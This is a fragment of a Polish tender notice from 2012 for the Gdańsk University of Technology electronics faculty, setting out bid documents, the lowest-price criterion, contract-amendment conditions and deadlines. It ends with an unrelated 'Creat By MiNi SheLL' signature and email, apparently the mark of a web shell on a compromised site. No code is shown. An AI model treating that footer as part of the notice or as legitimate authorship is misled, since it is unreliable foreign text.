2/ Opcjonalnie, jeśli występuje pełnomocnik, pełnomocnictwo dla osoby reprezentującej w niniejszym postępowaniu Wykonawcę lub pełnomocnictwo dla osoby lub podmiotu reprezentującego kilku Wykonawców składających ofertę wspólną.
3/Pisemne zobowiązanie podmiotu(ów) do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (w przypadku gdy Wykonawca będzie polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków);</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy może być dokonana tylko za zgodą obu Stron.
Wszystkie zmiany umowy dokonywane są w formie pisemnej i muszą być podpisane przez upoważnionych przedstawicieli obu Stron. 
Zamawiający dopuszcza możliwość zmian postanowień zawartej umowy w stosunku do treści oferty,  na podstawie której dokonano wyboru wykonawcy, dotyczących:
TERMINU
Termin zakończenia przedmiotu zamówienia ustalony w umowie może ulec zmianie w przypadku wystąpienia jednej z niżej wymienionej okoliczności pod warunkiem, że ma ona wpływ na termin realizacji całego przedmiotu umowy. Okoliczności mogące spowodować zmianę terminu mogą wynikać z:
a)	przestojów i opóźnień zawinionych przez zamawiającego,
b)	działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), 
c)	warunków atmosferycznych uniemożliwiających lub utrudniających wykonywanie robót 
-	fakt ten musi być potwierdzony notatką podpisana przez Strony,
d)	konieczności oczekiwania na wprowadzenie przez Projektanta korekt i uściśleń w rozwiązaniach projektowych,
e)	ujawnienia w trakcie realizacji przedmiotu umowy niezidentyfikowanej przeszkody w budynku,
f)	ujawnienia się w trakcie realizacji przedmiotu umowy nieprzewidzianych przeszkód formalno-prawnych,
g)	realizacji robót dodatkowych, zamiennych lub zaniechania części robót.
W okolicznościach wyżej wymienionych Strony ustalają nowe terminy umowne, z tym że wielkość zmian musi być powiązana z przyczyną jaka ją spowodowała.
Wydłużenie okresu obowiązywania umowy nakłada na wykonawcę obowiązek przedłużenia  terminu ważności zabezpieczenia należytego wykonania umowy, z zachowaniem ciągłości zabezpieczenia i jego wymaganej wysokości.
ZAKRESU I WARTOŚCI UMOWY
Powodem wprowadzenia zmian w zakresie i wartości umowy mogą być roboty zamienne lub zaniechane. 
Wprowadzenie robót zamiennych jest możliwe jeśli:
-	jest korzystne dla zamawiającego na etapie realizacji umowy lub przyniesie korzystne skutki w trakcie eksploatacji przedmiotu umowy
-	stało się konieczne na skutek ujawnienia się przeszkód w budynku  lub błędów w dokumentacji projektowej, 
-	pozwolą osiągnąć lepsze parametry techniczne, użytkowe, estetyczne od przyjętych w dokumentacji projektowej,
-	dotyczą zastosowania nowych technologii nieznanych zamawiającemu i niedostępnych w momencie zawarcia umowy.
Wprowadzenie robót zaniechanych jest możliwe jeśli:
-	są one następstwem zleconych robót dodatkowych
-	konieczność rezygnacji z tych robót jest niezbędna dla prawidłowego wykonania przedmiotu umowy
-	zaistniały istotne zmiany okoliczności powodujące, że wykonanie części robót nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy.
ZMIAN OSÓB, KTÓRE BĘDĄ UCZESTNICZYĆ W WYKONYWANIU ZAMÓWIENIA 
W przypadku wystąpienia konieczności zmiany osób, które będą uczestniczyć w wykonywaniu zamówienia Strony mają prawo do wprowadzenia tej zmiany w umowie, pod warunkiem, że nowe osoby będą spełniały warunki jakie określił Zamawiający.
ZMIAN OSÓB REPREZENTUJĄCYCH STRONY UMOWY
W przypadku zmian osób uprawnionych do reprezentowania Zamawiającego lub Wykonawcy Strony dokonają stosownych zmian w umowie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dzp.pg.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Politechnika Gdańska Wydział Elektroniki, Telekomunikacji i Informatyki, ul. Narutowicza 11/12, 80-233 Gdańsk, pok. 114.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.07.2012 godzina 10:00, miejsce: Politechnika Gdańska Wydział Elektroniki, Telekomunikacji i Informatyki, ul. Narutowicza 11/12, 80-233 Gdańsk, pok. 127..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com